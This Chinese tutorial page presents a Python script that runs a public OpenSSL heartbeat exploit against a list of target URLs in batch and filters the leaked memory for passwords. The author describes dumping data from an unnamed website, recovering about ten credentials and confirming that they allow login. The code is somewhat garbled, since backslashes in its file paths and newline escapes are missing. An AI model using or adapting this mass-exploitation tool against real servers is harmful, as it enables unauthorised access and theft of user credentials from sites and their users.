python批量检测openssl漏洞的程序

时间：2014-04-13 编辑：简简单单来源：一聚教程网

所以找了个站，用for循环，批量抓了100个文件，大概10分钟左右完成，查找帐号和密码大概有10个左右，测试基本都是可以登录的，如果是访问量大的网站，可能段时间内能抓到更多！自己利用现有EXP写了个方便批量检测该漏洞的，主要是练手python，感觉不练进步太慢

代码如下

复制代码

#coding:utf-8
import subprocess
import time

#遍历目标文件中的URL
def readtar(targetpath):
    f=open(targetpath,"r")
    for url in f.readlines():
        url=url.strip("rn")
        exploit(url)

#Exp执行，获取执行后的原始回显，发送给getres进行处理
def exploit(url):
    cmd="python "+r"e:dayopensslssltest.py "+url
    print cmd
    expover=subprocess.Popen(cmd,stdout=subprocess.PIPE)
    time.sleep(5)
    expres=expover.stdout.read()
    print expres
'''
#EXP执行回显筛选，获取有password的字符串
def getres(expres):
    ispwd=False
    if expres.find("password")>0:
        ispwd=True
    if ispwd==True:
        keywords="password"
        before=expres[expres.index(keywords)-280:expres.index(keywords)]
        after=expres[expres.index(keywords)+len(keywords):expres.index(keywords)+len(keywords)+140]
        passallstr=before+keywords+after
        print passallstr
        if len(passallstr)==0:
            print "Maybe no pass or user in strings"
'''
if __name__=='__main__':
    #注明测试目标所在文件
    targetfile=r"e:dayurl.txt"
    readtar(targetfile)

主要还是借助公布的exp,只是增加了很简单的文件读取遍历挨个测试的代码，还想只打印出出现”password”关键字的前后几行，最后貌似还有点问题，所以注释掉了。

上一个：解决php curl_multi批处理造成CPU负载过高问题
下一个： php数组分组简单例子

推荐专题

最新下载

热门教程

python批量检测openssl漏洞的程序

相关文章

热门栏目

php教程

asp.net教程

手机开发

css教程

网页制作

办公数码

jsp教程